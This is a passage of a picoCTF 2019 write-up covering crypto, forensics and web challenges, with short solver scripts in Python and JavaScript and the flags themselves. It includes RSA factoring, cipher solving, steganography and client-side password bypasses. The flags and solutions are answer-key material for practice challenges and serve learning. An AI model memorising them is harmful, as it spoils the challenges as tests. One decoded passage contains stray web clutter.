13016382529449106065894479374027604750406953699090365388203741824761323704182397


Heading over to python we can print the flag out

x = (bytes.fromhex(format(m,'x')))
print(x)

b'picoCTF{n33d_a_lArg3r_e_e8e7052f}'


### waves over lambda

#### Points: 300

We are given the following ciphertext

-------------------------------------------------------------------------------
flgiyorv utyt av mljy xdoi - xytwjtgfm_av_f_lnty_dopezo_nrfyxnnovl
-------------------------------------------------------------------------------
odtqtm xmlzlylnarfu coyopohln kov rut ruayz vlg lx xmlzly bondlnarfu coyopohln, o dogz lkgty ktdd cglkg ag ljy zavryafr ag uav lkg zom, ogz vradd ytptpetytz oplgi jv lkagi rl uav idllpm ogz ryoiaf ztoru, kuafu uobbtgtz ruayrttg mtoyv oil, ogz kuafu a vuodd ztvfyaet ag arv bylbty bdoft. xly rut bytvtgr a kadd lgdm vom ruor ruav dogzlkgtyxly vl kt jvtz rl fodd uap, odruljiu ut uoyzdm vbtgr o zom lx uav daxt lg uav lkg tvrortkov o vryogit rmbt, mtr lgt bytrrm xytwjtgrdm rl et ptr karu, o rmbt oestfr ogz nafaljv ogz or rut vopt rapt vtgvtdtvv. ejr ut kov lgt lx rulvt vtgvtdtvv btyvlgv kul oyt ntym ktdd foboedt lx dllcagi oxrty rutay klydzdm oxxoayv, ogz, obboytgrdm, oxrty glruagi tdvt. xmlzly bondlnarfu, xly agvrogft, etiog karu gtqr rl glruagi; uav tvrort kov lx rut vpoddtvr; ut yog rl zagt or lruty ptg'v roedtv, ogz xovrtgtz lg rutp ov o rlozm, mtr or uav ztoru ar obbtoytz ruor ut uoz o ujgzytz ruljvogz yljedtv ag uoyz fovu. or rut vopt rapt, ut kov odd uav daxt lgt lx rut plvr vtgvtdtvv, xogrovrafod xtddlkv ag rut kuldt zavryafr. a ytbtor, ar kov glr vrjbazarmrut poslyarm lx rutvt xogrovrafod xtddlkv oyt vuytkz ogz agrtddaitgr tgljiuejr sjvr vtgvtdtvvgtvv, ogz o btfjdaoy goralgod xlyp lx ar.


We simply run this through Quipqiup. The whole thing can be solved if we include the fact that

flgiyorv utyt av mljy xdoi - xytwjtgfm_av_f_lnty_dopezo = congrats here is your flag - frequency_is_c_over_lambda

#### Whole message

congrats here is your flag - frequency_is_c_over_lambda_vtcrfvvaso

ale?ey fyodorovitch ?arama?ov was the third son of fyodor pavlovitch ?arama?ov, a land owner well ?nown in our district in his own day, and still remembered among us owing to his gloomy and tragic death, which happened thirteen years ago, and which i shall describe in its proper place. for the present i will only say that this landownerfor so we used to call him, although he hardly spent a day of his life on his own estatewas a strange type, yet one pretty frequently to be met with, a type ab?ect and vicious and at the same time senseless. but he was one of those senseless persons who are very well capable of loo?ing after their worldly affairs, and, apparently, after nothing else. fyodor pavlovitch, for instance, began with ne?t to nothing; his estate was of the smallest; he ran to dine at other men’s tables, and fastened on them as a toady, yet at his death it appeared that he had a hundred thousand roubles in hard cash. at the same time, he was all his life one of the most senseless, fantastical fellows in the whole district. i repeat, it was not stupiditythe ma?ority of these fantastical fellows are shrewd and intelligent enoughbut ?ust senselessness, and a peculiar national form of it.

### b00tl3gRSA2

#### Points: 400

from Crypto.Util.number import inverse

c = 56655071811218224302828848384519761929289839550855972427206791329461775512270676034900409928292898003845734257623136840362218584497862865087461886207069787597998446055905343532681334059721570425129696993455754319242507507674580943623854203561027603379347296171186617627184609486456236613031591207061561272676
n = 96636736570006391860399135193259732242595830552235523260510184668822655545791163241131054447802725748664426942000825437273461145584615972378451691053658609612366871910701324807748704651074817206221988255491891215446330838210841688047206350113325714155872264893985927297410857408238972581432853154511703458633
d = 65537
e = 2229500063992090948516463866399266294624485341028428386558606576731615044711174433077347976335165194195349398603922182296374158904495771094743716631416326465247179896288728731731743749544188582814097137843422447642427165304689108521723489356048403573469866596455857380956843922925692792779549591136186267041

def get_RSA_flag(c,n,d):
m = pow(c,d,n)
return bytes.fromhex(format(m,'x'))

print(get_RSA_flag(c,n,d))


### b00tl3gRSA3

#### Points: 450

from Crypto.Util.number import inverse
from functools import reduce

c = 32785287387291578099923635290567397410890995803165406332608626598853945807914414181493453637294623115826646562281645665578709210105299157632411423778216770019720138538795448041254766028454614540363936453124864182099849535264994127650408849641519946717113935340974782725913487563495839861003299413348283870125175211815526729778176684395863316322
n = 60681440696288151202766581746354942086205677757405573958398717055255341502335281742341920650344262358338433249212745194346281177671599825637699559577854444053241983437238464141112534065923487024960855855636711574040123082298738257833957092014476942190859115415267888599216201747328865168746986327311224996067215723466592014296734971352912153559
e = 65537

factors = [8680361201, 8810373757, 8879622217, 9279907993, 10593071891, 10722199157, 10723883981, 11096702983, 11202477151, 11216194933, 11502747821, 11747849147, 11916512249, 12266755343, 12342527563, 12657666379, 12946245071, 13198870877, 13567767419, 13687577677, 13759459261, 14809052347, 14840695949, 15173858627, 15417585367, 15654210233, 15797156117, 16087543081, 16300327081, 16311877493, 16463889749, 16653070583, 16751698741, 16845385849]

print(reduce((lambda x, y: x * y), factors) == n)

phi = 1

for f in factors:
phi *= (f-1)

d = inverse(e,phi)
m = pow(c,d,n)
print(bytes.fromhex(format(m,'x')))


picoCTF{too_many_fact0rs_2020200}

### john_pollard

#### Points: 500

-----BEGIN CERTIFICATE-----
MIIB6zCB1AICMDkwDQYJKoZIhvcNAQECBQAwEjEQMA4GA1UEAxMHUGljb0NURjAe
Fw0xOTA3MDgwNzIxMThaFw0xOTA2MjYxNzM0MzhaMGcxEDAOBgNVBAsTB1BpY29D
VEYxEDAOBgNVBAoTB1BpY29DVEYxEDAOBgNVBAcTB1BpY29DVEYxEDAOBgNVBAgT
B1BpY29DVEYxCzAJBgNVBAYTAlVTMRAwDgYDVQQDEwdQaWNvQ1RGMCIwDQYJKoZI
al1hMsGeBb3rd/Oq+7uDguueopOvDC864hrpdGubgtjv/hrIsph7FtxM2B4rkkyA
eIV708y31HIplCLruxFdspqvfGvLsCynkYfsY70i6I/dOA6l4Qq/NdmkPDx7edqO
T/zK4jhnRafebqJucXFH8Ak+G6ASNRWhKfFZJTWj5CoyTMIutLU9lDiTXng3rDU1
BhXg04ei1jvAf0UrtpeOA6jUyeCLaKDFRbrOm35xI79r28yO8ng1UAzTRclvkORt
b8LMxw7e+vdIntBGqf7T25PLn/MycGPPvNXyIsTzvvY/MXXJHnAqpI5DlqwzbRHz
q16/S1WLvzg4PsElmv1f
-----END CERTIFICATE-----


Decoding the certificate (link) the important information is given

Key:
RSA Public Key [68:0d:58:fa:65:c4:fc:08:fa:45:55:37:9d:3d:e0:19:ec:29:d6:6c] modulus: 11a4d45212b17f public exponent: 10001

We see that n is very, very small. We can factor this

n = 4966306421059967
p = 73176001
q = 67867967


picoCTF{73176001,67867967}

# Forensics

### unzip

#### Points: 50

Just unzip the file and the flag is in the image

picoCTF{unz1pp1ng_1s_3a5y}

### So Meta

#### Points: 150

The flag is the “artist” of the image, found using exiftool file

Artist : picoCTF{s0_m3ta_74e57c5c}

### What Lies Within

#### Points: 150

This is a steganography challenge. Looking at the LSB data of the file using zsteg we obtain:

b1,rgb,lsb,xy       .. text: "picoCTF{h1d1ng_1n_th3_b1t5}"


picoCTF{h1d1ng_1n_th3_b1t5}

### extensions

#### Points: 150

Opening the file we see that it is a hex encoding of a file. The beginning shows that the file is a .png and correctly converting the file we obtain the flag

### WhitePages

#### Points: 250

We are given a text file encoded with two distinct whitespace characters. Replacing one with 0 and the other with 1 we get a binary representation of an ascii string

00001010000010010000100101110000011010010110001101101111010000110101010001000110000010100000101000001001000010010101001101000101010001010010000001010000010101010100001001001100010010010100001100100000010100100100010101000011010011110101001001000100010100110010000000100110001000000100001001000001010000110100101101000111010100100100111101010101010011100100010000100000010100100100010101010000010011110101001001010100000010100000100100001001001101010011000000110000001100000010000001000110011011110111001001100010011001010111001100100000010000010111011001100101001011000010000001010000011010010111010001110100011100110110001001110101011100100110011101101000001011000010000001010000010000010010000000110001001101010011001000110001001100110000101000001001000010010111000001101001011000110110111101000011010101000100011001111011011011100110111101110100010111110110000101101100011011000101111101110011011100000110000101100011011001010111001101011111011000010111001001100101010111110110001101110010011001010110000101110100011001010110010001011111011001010111000101110101011000010110110001011111001100110011000100110111001101010110000101100101001100110011100001100101001110010110011000110100001101010011011001100101011000010011000001100101001101100011001001100011011000010011000000110111001100100011011000110000011000100011011100110001011000010011001001111101000010100000100100001001


Decoding this binary to ascii, we obtain

picoCTF

SEE PUBLIC RECORDS & BACKGROUND REPORT
5000 Forbes Ave, Pittsburgh, PA 15213
picoCTF{not_all_spaces_are_created_equal_3175ae38e9f456ea0e62ca07260b71a2}


picoCTF{not_all_spaces_are_created_equal_3175ae38e9f456ea0e62ca07260b71a2}

### m00nwalk

#### Points:

This is an SSTV puzzle. Using the audio, with an RX mode of scottie was just able to make out the flag

picoCTF{beep_boop_im_in_space}

### pastaAAA

#### Points: 350

This pasta is up to no good. There MUST be something behind it.

Using stegsolve, we can see written on the image

picoCTF{pa$ta_1s_lyf3} # Web ### Insp3ct0r #### Points: 50 Search through the resources of the linked site to find the flag commented out <!-- Html is neat. Anyways have 1/3 of the flag: picoCTF{tru3_d3 --> /* You need CSS to make pretty pages. Here's part 2/3 of the flag: t3ct1ve_0r_ju5t */ /* Javascript sure is neat. Anyways part 3/3 of the flag: _lucky?d76327a1} */  picoCTF{tru3_d3t3ct1ve_0r_ju5t_lucky?d76327a1} ### dont-use-client-side #### Points: 100 function verify() { checkpass = document.getElementById("pass").value; split = 4; if (checkpass.substring(0, split) == 'pico') { if (checkpass.substring(split*6, split*7) == '4454') { if (checkpass.substring(split, split*2) == 'CTF{') { if (checkpass.substring(split*4, split*5) == 'ts_p') { if (checkpass.substring(split*3, split*4) == 'lien') { if (checkpass.substring(split*5, split*6) == 'lz_2') { if (checkpass.substring(split*2, split*3) == 'no_c') { if (checkpass.substring(split*7, split*8) == 'a}') { alert("Password Verified") } } } } } } } } else { alert("Incorrect password"); } }  Piecing this together, we obtain the flag picoCTF{no_clients_plz_24454a} ### where are the robots #### Points: 100 Hint towards looking at robots.txt https://2019shell1.picoctf.com/problem/47235/robots.txt Which hints towards https://2019shell1.picoctf.com/problem/47235/a262d.html This page has the flag picoCTF{ca1cu1at1ng_Mach1n3s_a262d} ### Client-side-again #### Points: 200 Cleaning up the source  function verify() { checkpass = document[_0x4b5b('0x0')]('pass')[_0x4b5b('0x1')]; split = 0x4; if (checkpass[_0x4b5b('0x2')](0x0, split * 0x2) == _0x4b5b('0x3')) { if (checkpass[_0x4b5b('0x2')](0x7, 0x9) == '{n') { if (checkpass[_0x4b5b('0x2')](split * 0x2, split * 0x2 * 0x2) == _0x4b5b('0x4')) { if (checkpass[_0x4b5b('0x2')](0x3, 0x6) == 'oCT') { if (checkpass[_0x4b5b('0x2')](split * 0x3 * 0x2, split * 0x4 * 0x2) == _0x4b5b('0x5')) { if (checkpass['substring'](0x6, 0xb) == 'F{not') { if (checkpass[_0x4b5b('0x2')](split * 0x2 * 0x2, split * 0x3 * 0x2) == _0x4b5b('0x6')) { if (checkpass[_0x4b5b('0x2')](0xc, 0x10) == _0x4b5b('0x7')) { alert(_0x4b5b('0x8')); } } } } } } } } else { alert(_0x4b5b('0x9')); } }  picoCTF{not_this_again_6c2047} ### picobrowser #### Points: 200 Set user agent to “picobrowser” and visit the page to obtain the flag picoCTF{p1c0_s3cr3t_ag3nt_665ad8a4} ### Java Script Kiddie #### Points: 400 Using the code from the source, together with the known 16 bytes of a png header 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52  We can have a fairly ugly function which tells us the output var bytes = [41, 117, 233, 27, 252, 188, 0, 146, 149, 206, 140, 223, 159, 37, 68, 82, 240, 74, 246, 255, 247, 0, 26, 8, 0, 69, 255, 6, 178, 248, 95, 108, 152, 241, 198, 71, 119, 10, 1, 182, 223, 0, 78, 68, 73, 23, 106, 228, 171, 46, 132, 114, 194, 0, 68, 190, 62, 0, 0, 13, 213, 1, 152, 35, 18, 80, 78, 2, 111, 73, 122, 252, 239, 120, 0, 0, 150, 66, 22, 146, 32, 0, 1, 191, 0, 9, 165, 234, 73, 14, 156, 237, 190, 72, 126, 40, 183, 0, 0, 110, 13, 29, 237, 198, 0, 96, 144, 163, 174, 192, 111, 188, 103, 16, 134, 153, 0, 192, 75, 0, 1, 106, 45, 27, 73, 75, 220, 223, 137, 57, 82, 139, 151, 21, 154, 10, 84, 132, 209, 248, 0, 55, 4, 85, 0, 157, 132, 255, 26, 94, 62, 114, 67, 92, 131, 241, 155, 106, 62, 247, 164, 174, 87, 49, 96, 99, 170, 65, 208, 234, 111, 71, 200, 45, 245, 24, 48, 198, 27, 112, 73, 170, 64, 41, 161, 71, 12, 58, 100, 27, 124, 221, 133, 59, 234, 87, 242, 206, 193, 15, 190, 245, 235, 49, 241, 198, 198, 223, 220, 17, 157, 223, 39, 11, 233, 137, 100, 184, 170, 136, 198, 15, 244, 189, 74, 77, 207, 15, 126, 23, 226, 63, 170, 99, 120, 37, 64, 99, 94, 102, 241, 13, 239, 160, 170, 6, 197, 121, 249, 62, 113, 124, 101, 189, 35, 190, 141, 143, 241, 126, 33, 63, 34, 170, 83, 17, 41, 132, 126, 66, 244, 24, 96, 143, 223, 106, 221, 37, 176, 111, 105, 249, 25, 0, 248, 253, 233, 246, 8, 191, 155, 132, 231, 2, 170, 146, 238, 231, 71, 235, 15, 245, 182, 160, 191, 49, 159, 45, 64, 162, 111, 41, 66, 153, 66, 11, 0, 71, 121, 17, 87, 239, 125, 211, 227, 211, 235, 87, 17, 172, 160, 205, 107, 126, 84, 158, 89, 45, 79, 157, 146, 132, 218, 132, 111, 255, 251, 82, 178, 253, 204, 254, 151, 150, 80, 181, 134, 81, 241, 39, 166, 23, 30, 150, 49, 234, 234, 76, 144, 64, 156, 245, 126, 174, 231, 34, 172, 104, 33, 89, 236, 187, 97, 70, 198, 217, 3, 255, 119, 31, 24, 136, 63, 234, 207, 234, 166, 151, 99, 252, 191, 156, 114, 233, 234, 245, 5, 214, 55, 191, 44, 114, 181, 123, 244, 24, 172, 250, 141, 244, 191, 21, 255, 252, 156, 29, 214, 191, 151, 245, 122, 77, 19, 66, 139, 202, 64, 90, 223, 222, 90, 24, 72, 156, 253, 91, 65, 184, 226, 23, 209, 6, 20, 223, 107, 79, 106, 14, 90, 186, 139, 11, 161, 244, 222, 249, 220, 227, 61, 229, 123, 171, 17, 61, 205, 190, 210, 208, 242, 189, 110, 21, 159, 160, 124, 214, 90, 69, 91, 126, 50, 134, 197, 31, 148, 236, 212, 163, 30, 73, 220, 236, 8, 191, 114, 206, 35, 190, 246, 150, 125, 111, 8, 254, 26, 10, 104, 169, 80, 88, 239, 196, 206, 234, 245, 90, 171, 59, 3, 176, 174, 243, 183, 249, 49, 214, 155, 92, 215, 1, 14, 207, 251, 8, 191, 153, 79, 177, 37, 194, 250, 179, 49, 243, 165, 70, 150, 99, 102, 184, 188, 96, 231, 227, 244, 60, 111, 233, 35, 155, 185, 247, 231, 20, 73, 160, 138, 255, 97, 200, 249, 239, 246, 234, 130, 93, 88, 183, 223, 45, 223, 115, 33, 89, 127, 5, 193, 69, 174, 207, 49, 252, 33, 13, 33, 214, 241, 219, 63, 127, 15, 112, 249, 177, 17, 225, 187, 61, 67, 248, 109, 115, 175, 105, 10, 200, 79, 167, 152, 100, 73, 144, 110, 91, 245, 24, 50, 117, 182, 253, 51, 211, 105, 39, 215, 22, 249, 249, 125, 93, 167, 220, 174, 253, 158, 61, 202, 121, 89, 99, 112, 131, 207, 214, 99, 83, 188, 166, 151, 49, 116, 8, 155, 239, 247, 31, 45, 39, 111, 63, 224, 78, 106, 207, 187, 143, 251, 127, 120, 247, 210, 220, 130, 211, 7, 209, 72, 173, 73, 227, 191, 23, 121, 222, 166, 131, 242, 5, 181, 124, 241, 147, 68, 122, 249, 45, 87, 89, 96, 130];$.get("bytes", function(resp) {
bytes = Array.from(resp.split(" "), x => Number(x));
});

function assemble_png(u_in){
var LEN = 16;
var key = "0000000000000000";
var shifter;
if(u_in.length == LEN){
key = u_in;
}
var result = [];
for(var i = 0; i < LEN; i++){
shifter = key.charCodeAt(i) - 48;
for(var j = 0; j < (bytes.length / LEN); j ++){
result[(j * LEN) + i] = bytes[(((j + shifter) * LEN) % bytes.length) + i]
}
}
while(result[result.length-1] == 0){
result = result.slice(0,result.length-1);
}
console.log(result.slice(0,16))
return false;
}

u_in = "8442621862337500"
assemble_png(u_in);

var desired = [137, 80, 78, 71, 13, 10, 26, 10, 0, 0, 0, 13, 73, 72, 68, 82]

Output:
(16)[137, 80, 78, 71, 13, 10, 26, 10, 0, 0, 0, 13, 73, 72, 68, 82]


Trial and error for all 16 bytes gives us the key

8442621862337500

and using this password on the site, we are given a QR code. When scanned gives the flag

picoCTF{65df43eff650d95dc1a21fef00d3d1b0}

### Java Script Kiddie 2

#### Points: 450

var bytes = [150, 142, 202, 248, 111, 246, 218, 255, 230, 162, 68, 114, 195, 254, 68, 170, 166, 26, 168, 39, 255, 252, 145, 255, 188, 207, 171, 223, 214, 78, 0, 49, 66, 96, 130, 229, 120, 109, 7, 137, 222, 63, 225, 255, 7, 0, 68, 191, 137, 80, 78, 90, 212, 227, 143, 2, 0, 120, 71, 73, 69, 72, 95, 255, 0, 0, 1, 199, 0, 163, 141, 81, 0, 0, 0, 0, 0, 192, 138, 65, 164, 0, 0, 62, 13, 0, 25, 127, 0, 0, 153, 13, 73, 65, 200, 250, 48, 16, 69, 0, 0, 10, 0, 55, 1, 0, 227, 0, 0, 55, 139, 128, 66, 142, 52, 71, 122, 0, 26, 0, 84, 0, 0, 237, 154, 63, 20, 174, 108, 185, 135, 114, 69, 73, 1, 0, 144, 120, 0, 81, 212, 91, 141, 0, 126, 149, 84, 2, 176, 134, 68, 10, 24, 3, 0, 13, 50, 227, 14, 82, 222, 120, 227, 127, 97, 143, 94, 114, 146, 144, 0, 49, 246, 166, 25, 108, 36, 34, 183, 55, 16, 136, 50, 65, 219, 170, 156, 192, 120, 36, 140, 220, 215, 177, 159, 153, 127, 159, 199, 202, 29, 167, 244, 128, 220, 124, 199, 145, 153, 159, 178, 146, 252, 139, 137, 7, 143, 48, 151, 243, 129, 216, 60, 146, 99, 252, 23, 141, 240, 187, 151, 177, 146, 241, 133, 255, 234, 222, 151, 124, 62, 127, 227, 169, 229, 36, 29, 241, 160, 228, 112, 0, 212, 250, 215, 55, 142, 205, 199, 5, 225, 134, 0, 28, 126, 179, 246, 185, 188, 142, 193, 192, 0, 112, 234, 67, 209, 249, 89, 152, 123, 22, 59, 167, 139, 60, 255, 203, 33, 62, 60, 241, 125, 61, 66, 71, 39, 7, 150, 250, 8, 80, 198, 223, 14, 29, 175, 55, 218, 249, 126, 138, 223, 160, 0, 162, 94, 254, 147, 230, 16, 234, 223, 248, 191, 197, 162, 145, 217, 248, 17, 254, 253, 121, 6, 157, 254, 109, 141, 223, 173, 64, 103, 24, 251, 242, 132, 62, 91, 29, 82, 152, 245, 185, 77, 202, 83, 202, 146, 175, 162, 109, 90, 247, 76, 103, 185, 187, 152, 127, 155, 119, 245, 71, 185, 203, 76, 168, 15, 229, 186, 172, 139, 17, 219, 32, 191, 108, 69, 217, 50, 195, 112, 192, 55, 70, 101, 39, 129, 86, 166, 111, 123, 47, 81, 75, 39, 52, 74, 212, 15, 85, 143, 212, 207, 127, 250, 111, 155, 30, 223, 121, 71, 186, 114, 77, 95, 147, 131, 214, 53, 100, 242, 165, 238, 228, 213, 181, 53, 144, 149, 88, 170, 4, 173, 55, 115, 96, 233, 219, 32, 244, 163, 127, 245, 14, 148, 202, 169, 237, 216, 69, 40, 127, 183, 93, 190, 124, 208, 127, 171, 148, 83, 127, 50, 116, 212, 95, 83, 233, 227, 243, 49, 252, 204, 69, 57, 58, 178, 49, 70, 217, 206, 135, 92, 210, 115, 13, 243, 2, 152, 175, 244, 5, 32, 146, 205, 126, 62, 27, 169, 201, 109, 32, 245, 191, 31, 143, 202, 248, 197, 223, 172, 63, 210, 137, 62, 205, 18, 226, 12, 200, 163, 190, 246, 224, 38, 196, 108, 77, 144, 84, 191, 182, 239, 203, 215, 126, 248, 252, 244, 44, 223, 254, 27, 206, 127, 54, 7, 211, 150, 87, 255, 111, 223, 224, 36, 181, 65, 135, 69, 195, 124, 83, 205, 183, 223, 19, 194, 56, 55, 133, 124, 223, 96, 101, 186, 103, 90, 171, 164, 39, 50, 109, 22, 192, 234, 87, 227, 162, 245, 21, 117, 1, 224, 229, 124, 118, 2, 88, 246, 197, 151, 235, 234, 140, 198, 0, 175, 87, 235, 215, 220, 75, 176, 57, 228, 150, 182, 120, 18, 53, 175, 239, 13, 67, 116, 192, 198, 198, 196, 185, 227, 83, 26, 255, 76, 101, 9, 207, 145, 71, 140, 254, 44, 106, 31, 143, 247, 94, 43, 86, 109, 49, 71, 62, 38, 251, 147, 139, 85, 76, 82, 184, 179, 196, 35, 249, 159, 62, 177, 252, 203, 57, 91, 117, 147, 124, 222, 28, 23, 255, 57, 130, 24, 149, 255, 92, 127, 71, 162, 91, 55, 48];

function assemble_png(u_in){
var LEN = 16;
var key = "00000000000000000000000000000000";
var shifter;
if(u_in.length == key.length){
key = u_in;
}
var result = [];
for(var i = 0; i < LEN; i++){
shifter = Number(key.slice((i*2),(i*2)+1));
for(var j = 0; j < (bytes.length / LEN); j ++){
result[(j * LEN) + i] = bytes[(((j + shifter) * LEN) % bytes.length) + i]
}
}
while(result[result.length-1] == 0){
result = result.slice(0,result.length-1);
}
// console.log(result.slice(0,16))
return result.slice(0,16);
}

var desired = [137, 80, 78, 71, 13, 10, 26, 10, 0, 0, 0, 13, 73, 72, 68, 82]

var test = "30303070506070905a6b9c5d50302e90";
result = assemble_png(test)

console.log(result)

// 3
// 3
// 3
// 7
// 5
// 6
// 7
// 9
// 3,4,5
// 4,5,6,7
// 4,7,8,9
// 5,9
// 5
// 3
// 0,2
// 9

solution

// 30303070506070905a6b9c5d50302e90


picoCTF{ec4fe193b0ebd7e2c20e701f493263d6}